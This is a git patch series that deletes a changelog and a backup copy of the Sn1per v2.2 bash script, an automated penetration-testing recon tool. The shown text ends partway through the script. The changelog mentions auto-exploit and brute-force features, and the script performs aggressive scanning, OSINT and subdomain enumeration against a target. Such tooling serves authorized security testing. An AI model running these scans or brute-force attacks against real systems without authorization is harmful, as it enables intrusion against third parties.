From 448bb4328448b4316401dd0b78e5611fe392b148 Mon Sep 17 00:00:00 2001 From: 1N3 <1N3@hushmail.com> Date: Mon, 2 Jan 2017 19:03:33 -0700 Subject: [PATCH 1/2] Delete CHANGELOG.md~ --- CHANGELOG.md~ | 133 -------------------------------------------------- 1 file changed, 133 deletions(-) delete mode 100644 CHANGELOG.md~ diff --git a/CHANGELOG.md~ b/CHANGELOG.md~ deleted file mode 100644 index fd12072..0000000 --- a/CHANGELOG.md~ +++ /dev/null @@ -1,133 +0,0 @@ -## CHANGELOG: -* v2.2c - Added CouchDB checks -* v2.2c - Updated Sub-domain takeover list -* v2.2b - Added fullportonly mode to do exclusive full port scans -* v2.2b - Fixed minor issue with Metasploit Pro not starting -* v2.2b - Fixed minor issue with sniper loot command -* v2.2a - Fixed minor issue with loot function -* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration -* v2.2 - Added Sn1per workspaces to loot directory -* v2.1d - Added crt.sh sub-domain check -* v2.1d - Removed blank screenshots from loot directory -* v2.1c - Fixed issue with install.sh install directories -* v2.1b - Added automatic Metasploit NMap xml imports for loot directory -* v2.1b - Removed Zenmap -* v2.1a - Separated Arachni reports for port 80/443/tcp -* v2.1a - Fixed NMap full port scan options -* v2.1 - Added Arachni with auto HTML web reporting (web mode only) -* v2.1 - Added full NMap detailed port scans -* v2.1 - Added port 4443/tcp checks -* v2.1 - Added META tag scans for web apps -* v2.1 - Removed Uniscan from web mode -* v2.1 - Removed SQLMap from web mode -* v2.0b - Added help option --help -* v2.0a - Fixed issue with ssh-audit -* v2.0a - Fixed issue with 'discover' mode -* v2.0 - Updated sub-domain takeover list -* v2.0 - Improved scan performance for stealth, airstrike and discover modes -* v2.0 - Removed jexboss due to clear screen issue with output -* v2.0 - Auto loot directory sorting for all tools -* v2.0 - Updated install.sh package list -* v1.9c - Enabled BruteX automated brute force attacks -* v1.9b - Fixed MSSQL port 1433/tcp port scan check (@hacktrack) -* v1.9a - Removed testssl script from stealth mode scans -* v1.9 - Added Ubuntu docker image for Sn1per (@menzow) -* v1.9 - Added automatic loot directory sorting for all modes -* v1.9 - Added MSSQL port 1433/tcp checks -* v1.9 - Added SNMP port 162/tcp checks (@hexageek) -* v1.9 - Added nslookup to install.sh -* v1.9 - Fixed install.sh dependency duplicates -* v1.8c - Added -A option to all NMap port scans -* v1.8c - Fixed install.sh permission issue -* v1.8c - Fixed install.sh cleanup options -* v1.8c - Added ssh-audit -* v1.8c - Added install directory (/usr/share/sniper/) to install script for universal access -* v1.8c - Fixed issue with Metasploit SSH scans -* v1.8c - Added auto-update to install.sh to automatically pull latest github release -* v1.8b - Fixed bug with NMap UDP scan options -* v1.8b - Fixed install.sh dependencies -* v1.8b - Fixed jexboss options -* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy) -* v1.8 - Added sub-domain hijack scans for all sub-domains -* v1.8 - Added auto explort of all sub-domains to /domains directory -* v1.8 - Added additional stealth and airstrike checks for port 80 and 443 -* v1.8 - Fixed issue with theHarvester not working with google -* v1.7g - Added email security/spoofing checks -* v1.7f - Added Zenmap XML auto-imports -* v1.7f - Added ClamAV RCE Nmap script -* v1.7e - Fixed minor issue with airstrike and nuke mode -* v1.7e - Fixed minor issues with discover mode -* v1.7e - Added minor cosmetic improvements to reports -* v1.7e - Disabled automatic brute forcing by default -* v1.7e - Added automatic brute force setting in script vars -* v1.7d - Added sslyze -* v1.7d - Added 'discover' mode for full subnet scans -* v1.7d - Added verbosity to scan tasks to separate sub-tasks better -* v1.7c - Added plain text reporting -* v1.7c - Improved loot directory structure and sorting -* v1.7b - Fixed issue with airstrike mode not scanning correctly -* v1.7b - Improved passive recon performance -* v1.7a - Improved NMap http scan performance -* v1.7a - Removed joomscan due to verbosity issues -* v1.7 - Added uniscan web vulnerability scanner -* v1.7 - Added joomscan Joomla scanner -* v1.7 - Improved web scan performance -* v1.7 - Fixed issue with inurlbr output -* v1.7 - Added remote desktop viewing for RDP connections -* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081) -* v1.6e - Added reporting option for nobrute mode (CC. @mero01) -* v1.6e - Improved SMB scan performance/optimization added -* v1.6d - Improved NMap scan performance options -* v1.6d - Added xprobe2 OS finger printing tool -* v1.6d - Added jexbos JBoss autopwn -* v1.6d - Merged fix for theharvester package (CC. @RubenRocha) -* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01) -* v1.6c - Add report mode for web scans -* v1.6c - Fixed issues with Sublist3r and theharvester -* v1.6c - Added Shocker Shellshock exploitation scanner -* v1.6b - Added Sublist3r sub-domain brute tool -* v1.6b - Added cutycapt web screenshot util -* v1.6a - Added improvements to recon phase -* v1.6a - Fixed small issue with 3rd party extension -* v1.6a - Various improvements to overall optimization of scans -* v1.6a - Added new "web" mode for full web application scans -* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke -* v1.6 - Added Java de-serialization scanner -* v1.6 - Added reporting option to output to console and text file for all scans -* v1.6 - Added option to set Sn1per full path for universal command line access -* v1.6 - Added in DirBuster for web file brute forcing -* v1.6 - Fixed issue with sderr errors in TheHarvester -* v1.5e - Removed shodan command line tool due to issues -* v1.5e - Fixed wafwoof installation in kali 2.0 -* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks -* v1.5c - Fixed issue which broke link to sniper directory -* v1.5b - Added Squid Proxy checks port 3128/tcp -* v1.5b - Fixed shodan setup options in install.sh -* v1.5b - Fixed syntax error with theHarvester in install.sh -* v1.5a - Fixed syntax error with port 8081 checks -* v1.5a - Added Arachni integration -* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits -* v1.5 - Added Metasploit scan and auto-exploit modules -* v1.5 - Added additional port checks -* v1.5 - Added full TCP/UDP NMap XML output -* v1.5 - Auto tune scan for either IP or hostname/domain -* v1.4h - Added auto IP/domain name scan configurations -* v1.4g - Added finger enumeration scripts -* v1.4g - Fixed nmap -p 445 target issue -* v1.4g - Fixed smtp-enum target issue -* v1.4f - Fixed BruteX directory bug -* v1.4e - Fixed reported errors install.sh -* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs -* v1.4d - Fixed missing rake gem install dependency -* v1.4c - Reordered 3rd party extensions -* v1.4b - Fixed install.sh executable references -* v1.4b - Fixed Yasou dependencies in install.sh -* v1.4b - Fixed minor issues with BruteX loot directory -* v1.4 - Added Yasou for automatic web form brute forcing -* v1.4 - Added MassBleed for SSL vulnerability detection -* v1.4 - Added Breach-Miner for detection of breached accounts -* v1.4 - Fixed minor errors with nmap -* v1.4 - Removed debug output from goohak from displaying on console - -## FUTURE: -* Add auto logging and reporting to all scans From 016af76d8fac4061467c401c0687be046000d632 Mon Sep 17 00:00:00 2001 From: 1N3 <1N3@hushmail.com> Date: Mon, 2 Jan 2017 19:03:47 -0700 Subject: [PATCH 2/2] Delete sniper~ --- sniper~ | 1418 ------------------------------------------------------- 1 file changed, 1418 deletions(-) delete mode 100644 sniper~ diff --git a/sniper~ b/sniper~ deleted file mode 100644 index 223f6f6..0000000 --- a/sniper~ +++ /dev/null @@ -1,1418 +0,0 @@ -#!/bin/bash -# + -- --=[Sn1per v2.2 by 1N3 -# + -- --=[http://crowdshield.com -# -# Sn1per - Automated Pentest Recon Tool -# -# FEATURES: -# - Automatically collect recon info (ie. whois, ping, DNS, etc.) -# - Automatically collects Google hacking recon info -# - Automatically run port scans -# - Automatically brute force sub-domains via DNS -# - Automatically checks for sub-domain hijacking -# - Automatically run targeted nmap scripts against open ports -# - Automatically scans all web applications -# - Automatically brute forces all open services -# - Automatically runs targeted metasploit scan and exploit modules -# - Automatically scan multiple hosts -# -# INSTALL: -# ./install.sh - Installs all dependencies. Best run from Kali Linux. -# -# USAGE: -# sniper -# sniper -# sniper discover -# sniper stealth -# sniper port -# sniper -# sniper web -# sniper airstrike -# sniper nuke -# sniper loot -# - -TARGET="$1" -MODE="$2" -OPT1="$3" -INSTALL_DIR="/usr/share/sniper" -LOOT_DIR="/usr/share/sniper/loot" -PLUGINS_DIR="/usr/share/sniper/plugins" -CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py" -SAMRDUMP="/usr/share/sniper/bin/samrdump.py" -DNSDICT6="/usr/share/sniper/bin/dnsdict6" -INURLBR="/usr/share/sniper/bin/inurlbr.php" -USER_FILE="/usr/share/brutex/wordlists/simple-users.txt" -PASS_FILE="/usr/share/brutex/wordlists/password.lst" -DNS_FILE="/usr/share/brutex/wordlists/namelist.txt" -SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh" -THREADS="30" -OKBLUE='\033[94m' -OKRED='\033[91m' -OKGREEN='\033[92m' -OKORANGE='\033[93m' -RESET='\e[0m' -REGEX='^[0-9]+$' - -# ENABLE/DISABLE AUTOMATIC BRUTE FORCE -# DEFAULT IS "1" (ENABLED) -AUTOBRUTE="1" - -# ENABLE/DISABLE FULL DETAILED NMAP SCAN -# DEFAULT IS "1" (ENABLED) -FULLNMAPSCAN="1" - -cd $INSTALL_DIR - -function loot { - echo -e "$OKRED ____ $RESET" - echo -e "$OKRED _________ / _/___ ___ _____$RESET" - echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" - echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" - echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" - echo -e "$OKRED /_/ $RESET" - echo "" - echo -e "$OKORANGE + -- --=[Current workspaces...$RESET" - cd $LOOT_DIR - ls -lh $LOOT_DIR/workspace/ - echo -e "$OKORANGE + -- --=[Enter a name for the workspace:$RESET" - read WORKSPACE - if [ -z $WORKSPACE ]; then - WORKSPACE="default" - fi - mkdir -p $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null - echo -e "$OKORANGE + -- --=[Generating reports...$RESET" - for a in `ls sniper-*.txt 2>/dev/null`; - do - echo "$a" > $LOOT_DIR/reports/$a - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a - mv $a $LOOT_DIR/output/ - done - echo -e "$OKORANGE + -- --=[Removing blank web screenshots...$RESET" - find /usr/share/sniper/loot/screenshots/ -size -10k -exec rm -f {} \; 2> /dev/null - rm -f $LOOT_DIR/.fuse_* 2> /dev/null - echo -e "$OKORANGE + -- --=[Starting Metasploit service...$RESET" - /etc/init.d/metasploit start 2> /dev/null - /etc/init.d/postgresql start 2> /dev/null - echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit...$RESET" - msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;" - echo -e "$OKORANGE + -- --=[Copying loot to workspace: $WORKSPACE...$RESET" - cp -Rf $LOOT_DIR/screenshots/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null - cp -Rf $LOOT_DIR/nmap/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null - cp -Rf $LOOT_DIR/domains/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null - cp -Rf $LOOT_DIR/output/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null - cp -Rf $LOOT_DIR/reports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null - cp -Rf $LOOT_DIR/imports/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null - cp -Rf $LOOT_DIR/notes/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null - cp -Rf $LOOT_DIR/web/ $LOOT_DIR/workspace/$WORKSPACE/ 2> /dev/null - rm -Rf $LOOT_DIR/screenshots/ 2> /dev/null - rm -Rf $LOOT_DIR/nmap/ 2> /dev/null - rm -Rf $LOOT_DIR/domains/ 2> /dev/null - rm -Rf $LOOT_DIR/output/ 2> /dev/null - rm -Rf $LOOT_DIR/reports/ 2> /dev/null - rm -Rf $LOOT_DIR/imports/ 2> /dev/null - rm -Rf $LOOT_DIR/notes/ 2> /dev/null - rm -Rf $LOOT_DIR/web/ 2> /dev/null - mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null - mkdir $LOOT_DIR/nmap -p 2> /dev/null - mkdir $LOOT_DIR/domains -p 2> /dev/null - mkdir $LOOT_DIR/output -p 2> /dev/null - mkdir $LOOT_DIR/reports -p 2> /dev/null - mkdir $LOOT_DIR/imports -p 2> /dev/null - mkdir $LOOT_DIR/notes -p 2> /dev/null - mkdir $LOOT_DIR/web -p 2> /dev/null - echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET" - iceweasel 2> /dev/null & - sleep 2 - iceweasel $LOOT_DIR/workspace/$WORKSPACE 2> /dev/null & - sleep 2 - echo -e "$OKORANGE + -- --=[Launching Metasploit Pro Web UI...$RESET" - iceweasel http://localhost:3001/login 2> /dev/null & - echo -e "$OKORANGE + -- --=[Launching Zenmap...$RESET" - zenmap -f $LOOT_DIR/workspace/$WORKSPACE/nmap/ 2> /dev/null & - echo -e "$OKORANGE + -- --=[Done!$RESET" -} - -function help { - echo -e "$OKRED ____ $RESET" - echo -e "$OKRED _________ / _/___ ___ _____$RESET" - echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" - echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" - echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" - echo -e "$OKRED /_/ $RESET" - echo "" - echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET" - echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET" - echo -e "$OKORANGE + -- --=[Usage:" - echo "" - echo ' [*] sniper ' - echo ' [*] sniper stealth ' - echo ' [*] sniper discover' - echo ' [*] sniper port ' - echo ' [*] sniper fullportonly ' - echo ' [*] sniper web ' - echo ' [*] sniper nobrute ' - echo ' [*] sniper airstrike ' - echo ' [*] sniper nuke ' - echo ' [*] sniper loot' - echo "" - echo ' + -- --=[Modes:' - echo '' - echo ' + -- --=[REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append report to any sniper mode or command.' - echo ' + -- --=[STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking' - echo ' + -- --=[DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.' - echo ' + -- --=[PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.' - echo ' + -- --=[WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.' - echo ' + -- --=[NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.' - echo ' + -- --=[AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.' - echo ' + -- --=[NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.' - echo -e " + -- --=[LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type sniper loot.$RESET" - echo "" - echo "" -} - -if [ -z $TARGET ]; then - echo -e "$OKRED ____ $RESET" - echo -e "$OKRED _________ / _/___ ___ _____$RESET" - echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" - echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" - echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" - echo -e "$OKRED /_/ $RESET" - echo -e "" - echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET" - echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3$RESET" - echo -e "$OKORANGE + -- --=[Usage: sniper $RESET" - echo "" - exit -fi - -if [[ $TARGET = "--help" ]]; then - help - exit -fi - -if [[ ${TARGET:0:1} =~ $REGEX ]]; - then - SCAN_TYPE="IP" -else - SCAN_TYPE="DOMAIN" -fi - -if [ "$MODE" = "report" ]; then - sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1 - exit -fi - -if [ "$TARGET" = "loot" ]; then - loot - exit -fi - -if [ "$MODE" = "discover" ]; then - echo -e "$OKRED ____ /\\" - echo -e "$OKRED Sn1per by 1N3 @CrowdShield \ \\" - echo -e "$OKRED https://crowdshield.com \ \\" - echo -e "$OKRED ___ / \\" - echo -e "$OKRED \ \\" - echo -e "$OKRED === > [ \\" - echo -e "$OKRED / \ \\" - echo -e "$OKRED \ / /" - echo -e "$OKRED === > [ /" - echo -e "$OKRED / /" - echo -e "$OKRED ___ \ /" - echo -e "$OKRED / /" - echo -e "$OKRED ____ / /" - echo -e "$OKRED \/$RESET" - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Running Ping Discovery Scan]=------------- -- +$RESET" - nmap -sP $TARGET - echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET" - arp -a -n - echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET" - unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt - echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET" - cat $LOOT_DIR/domains/sniper-ips.txt - echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET" - echo "" - if [ "$OPT1" = "report" ]; then - for a in `cat $LOOT_DIR/domains/sniper-ips.txt` - do sniper $a stealth report - done - exit - fi - for a in `cat $LOOT_DIR/domains/sniper-ips.txt` - do sniper $a stealth - done - exit -fi - -if [ "$MODE" = "web" ]; then - if [ "$OPT1" = "report" ]; then - sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 - loot - exit - fi -fi - -if [ "$MODE" = "stealth" ]; then - if [ "$OPT1" = "report" ]; then - sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 - exit - fi - echo -e "$OKRED ____ $RESET" - echo -e "$OKRED _________ / _/___ ___ _____$RESET" - echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" - echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" - echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" - echo -e "$OKRED /_/ $RESET" - echo -e "$RESET" - echo -e "$OKORANGE + -- --=[http://crowdshield.com" - echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3" - echo -e "$OKRED " - echo -e "$OKRED ./\." - echo -e "$OKRED ./ '\." - echo -e "$OKRED \. '\." - echo -e "$OKRED '\. '\." - echo -e "$OKRED '\. '\." - echo -e "$OKRED '\. '\." - echo -e "$OKRED ./ '\." - echo -e "$OKRED ./ ____'\." - echo -e "$OKRED ./ < '\." - echo -e "$OKRED \-------\ '> '\." - echo -e "$OKRED '\=====> ___< '\." - echo -e "$OKRED ./-----/ __________'\." - echo -e "$OKRED "' \.------\ _____ ___(_)(_\."\' - echo -e "$OKRED '\=====> < ./'" - echo -e "$OKRED ./-----/ '> ./" - echo -e "$OKRED \. ___< ./" - echo -e "$OKRED '\. ./" - echo -e "$OKRED '\. ./" - echo -e "$OKRED '\. ./" - echo -e "$OKRED ./ ./" - echo -e "$OKRED ./ ./ Carl Pilcher" - echo -e "$OKRED ./ ./" - echo -e "$OKRED ./ ./" - echo -e "$OKRED ./ ./" - echo -e "$OKRED \. ./" - echo -e "$OKRED '\. ./" - echo -e "$OKRED '\/" - echo -e "$RESET" - echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET" - echo -e "$OKGREEN $RESET" - echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" - nslookup $TARGET - host $TARGET - if [ $SCAN_TYPE == "DOMAIN" ]; - then - echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" - whois $TARGET - echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" - theharvester -d $TARGET -l 100 -b bing 2> /dev/null - echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" - dig -x $TARGET - dnsenum $TARGET - mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null - echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" - python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null - dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null - echo "" - echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET" - echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET" - echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET" - echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET" - echo -e "$OKBLUE" - curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's///g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt - echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt" - cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null - cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null - sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt - rm -f /tmp/curl.out 2> /dev/null - echo -e "$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" - for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot|cloudfront|modulus" 2>/dev/null; done; - echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" - python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null - fi - echo "" - echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" - nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,5984,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml - echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" - nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET - - port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` - port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` - - if [ -z "$port_80" ]; - then - echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET" - else - echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" - wafw00f http://$TARGET - echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" - whatweb http://$TARGET - echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET" - xsstracer $TARGET 80 - echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" - cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg - fi - - if [ -z "$port_443" ]; - then - echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET" - else - echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET" - echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" - wafw00f https://$TARGET - echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" - whatweb https://$TARGET - echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET" - xsstracer $TARGET 443 - echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" - sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET - sslscan --no-failed $TARGET - echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" - cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg - echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$TARGET-port443.jpg" - fi - - echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - echo -e "" - rm -f $INSTALL_DIR/.fuse_* 2> /dev/null - exit -fi - -if [ "$MODE" = "airstrike" ]; then - if [ "$OPT1" = "report" ]; then - sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 - exit - fi - echo -e "$OKRED ____ $RESET" - echo -e "$OKRED _________ / _/___ ___ _____$RESET" - echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" - echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" - echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" - echo -e "$OKRED /_/ $RESET" - echo -e "$RESET" - echo -e "$OKORANGE + -- --=[http://crowdshield.com" - echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3" - - for a in `cat $TARGET`; - do - echo -e "$OKRED |" - echo -e "$OKRED | |" - echo -e "$OKRED | -/_\-" - echo -e "$OKRED -/_\- ______________(/ . \)______________" - echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" - echo -e "$OKRED <> \___/ <> <>" - echo -e "$OKRED " - echo -e "$OKRED ||" - echo -e "$OKRED <>" - echo -e "$OKRED ||" - echo -e "$OKRED <>" - echo -e "$OKRED ||" - echo -e "$OKRED || BIG" - echo -e "$OKRED _____ __ <> (^)))^ BOOM!" - echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" - echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" - echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" - echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" - echo -e "$OKRED | ||. | | | ||| |||||" - echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" - echo -e "$OKRED | ||. | | | ||| |||||" - echo -e "$OKRED __________________________________________________________" - echo -e "$OKRED Bomb raid (contributed by Michael aka SNOOPY@DRYCAS.CLUB.CC.CMU.EDU)" - echo -e "$RESET" - echo -e "$OKORANGE + -- --=[Launching airstrike: $a $RESET" - echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" - nslookup $a - host $a - - if [[ ${a:0:1} =~ $REGEX ]]; - then - SCAN_TYPE="IP" - else - SCAN_TYPE="DOMAIN" - fi - - if [ $SCAN_TYPE == "DOMAIN" ]; - then - echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" - whois $a - echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" - theharvester -d $a -l 100 -b bing 2> /dev/null - echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" - dig -x $a - dnsenum $a - mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null - echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" - python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null - dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null - echo "" - echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET" - echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET" - echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET" - echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET" - echo -e "$OKBLUE" - curl -s https://crt.sh/?q=%25.$a > /tmp/curl.out && cat /tmp/curl.out | grep $a | grep TD | sed -e 's///g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$a-crt.txt && cat $LOOT_DIR/domains/domains-$a-crt.txt - echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$a-full.txt" - cat $LOOT_DIR/domains/domains-$a-crt.txt > /tmp/curl.out 2> /dev/null - 